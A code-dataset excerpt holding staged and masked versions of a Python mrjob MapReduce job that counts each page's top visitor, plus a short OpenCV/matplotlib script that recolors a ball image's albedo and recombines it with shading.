"step-3": "<mask token>\n\n\ndef read_csvLine(line):\n for row in csv.reader([line]):\n return row\n\n\nclass MRTopVisitorCount(MRJob):\n\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]: visitor[1]})\n yield page, count\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n\n def steps(self):\n return [MRStep(mapper=self.mapper_count, reducer=self.reducer_count\n ), MRStep(mapper=self.mapper_sort, reducer=self.reducer_sort)]\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef read_csvLine(line):\n for row in csv.reader([line]):\n return row\n\n\nclass MRTopVisitorCount(MRJob):\n\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]: visitor[1]})\n yield page, count\n\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n\n def steps(self):\n return [MRStep(mapper=self.mapper_count, reducer=self.reducer_count\n ), MRStep(mapper=self.mapper_sort, reducer=self.reducer_sort)]\n\n\nif __name__ == '__main__':\n MRPageFreqCount.run()\n",
"step-5": "from mrjob.job import MRJob\nfrom mrjob.step import MRStep\nfrom collections import Counter\nimport csv\n\ndef read_csvLine(line):\n # Given a comma delimited string, return fields\n for row in csv.reader([line]):\n return row\n\nclass MRTopVisitorCount(MRJob):\n \n # Mapper1: emit page_id, 1\n def mapper_count(self, _, line):\n fields = read_csvLine(line)\n yield fields[1], (fields[4], 1)\n\n # Reducer1: aggregate page_id\n def reducer_count(self, page, counts):\n count = Counter()\n for visitor in counts:\n count.update({visitor[0]:visitor[1]})\n yield page, count\n \n # Mapper2: invert page and counts to sort\n def mapper_sort(self, page, counts):\n top = Counter(counts).most_common(1)\n yield page, (top[0][0], top[0][1])\n \n # Reducer2: identity\n def reducer_sort(self, page, visitor_count):\n for v in visitor_count:\n yield page, v\n \n # Multi-step pipeline definition\n def steps(self):\n return [\n MRStep(mapper=self.mapper_count,\n reducer=self.reducer_count),\n MRStep(mapper=self.mapper_sort,\n reducer=self.reducer_sort)]\n \n \n \n\nif __name__ == '__main__':\n MRPageFreqCount.run()",
"step-ids": [
3,
6,
7,
8,
10
]
}
|
[
3,
6,
7,
8,
10
] |
import cv2
import matplotlib.pyplot as plt
import numpy as np
ball = plt.imread('ball.png')
albedo = plt.imread('ball_albedo.png')
shading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)
x,y,z = np.where(albedo != 0)
print('Albedo:', albedo[x[0],y[0]])
print("Albedo in RGB space:", albedo[x[0],y[0]]*255)
# conversion of shading to RGB mapped the values to [0,1], therefore (0,255,0) = (0,1,0)
albedo[np.where(albedo[:,:,] != (0,0,0))[:-1]] = (0,1.,0)
plt.subplot(1,2,1)
plt.imshow(ball)
plt.subplot(1,2,2)
plt.imshow(albedo * shading)
plt.show()
|
normal
|
{
"blob_id": "cc6f70e328b774972e272e9600274dfd9fca93ee",
"index": 3073,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Albedo:', albedo[x[0], y[0]])\nprint('Albedo in RGB space:', albedo[x[0], y[0]] * 255)\n<mask token>\nplt.subplot(1, 2, 1)\nplt.imshow(ball)\nplt.subplot(1, 2, 2)\nplt.imshow(albedo * shading)\nplt.show()\n",
"step-3": "<mask token>\nball = plt.imread('ball.png')\nalbedo = plt.imread('ball_albedo.png')\nshading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)\nx, y, z = np.where(albedo != 0)\nprint('Albedo:', albedo[x[0], y[0]])\nprint('Albedo in RGB space:', albedo[x[0], y[0]] * 255)\nalbedo[np.where(albedo[:, :] != (0, 0, 0))[:-1]] = 0, 1.0, 0\nplt.subplot(1, 2, 1)\nplt.imshow(ball)\nplt.subplot(1, 2, 2)\nplt.imshow(albedo * shading)\nplt.show()\n",
"step-4": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nball = plt.imread('ball.png')\nalbedo = plt.imread('ball_albedo.png')\nshading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)\nx, y, z = np.where(albedo != 0)\nprint('Albedo:', albedo[x[0], y[0]])\nprint('Albedo in RGB space:', albedo[x[0], y[0]] * 255)\nalbedo[np.where(albedo[:, :] != (0, 0, 0))[:-1]] = 0, 1.0, 0\nplt.subplot(1, 2, 1)\nplt.imshow(ball)\nplt.subplot(1, 2, 2)\nplt.imshow(albedo * shading)\nplt.show()\n",
"step-5": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nball = plt.imread('ball.png')\nalbedo = plt.imread('ball_albedo.png')\nshading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)\n\nx,y,z = np.where(albedo != 0)\nprint('Albedo:', albedo[x[0],y[0]])\nprint(\"Albedo in RGB space:\", albedo[x[0],y[0]]*255)\n\n# conversion of shading to RGB mapped the values to [0,1], therefore (0,255,0) = (0,1,0)\nalbedo[np.where(albedo[:,:,] != (0,0,0))[:-1]] = (0,1.,0)\n\nplt.subplot(1,2,1)\nplt.imshow(ball)\nplt.subplot(1,2,2)\nplt.imshow(albedo * shading)\n\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.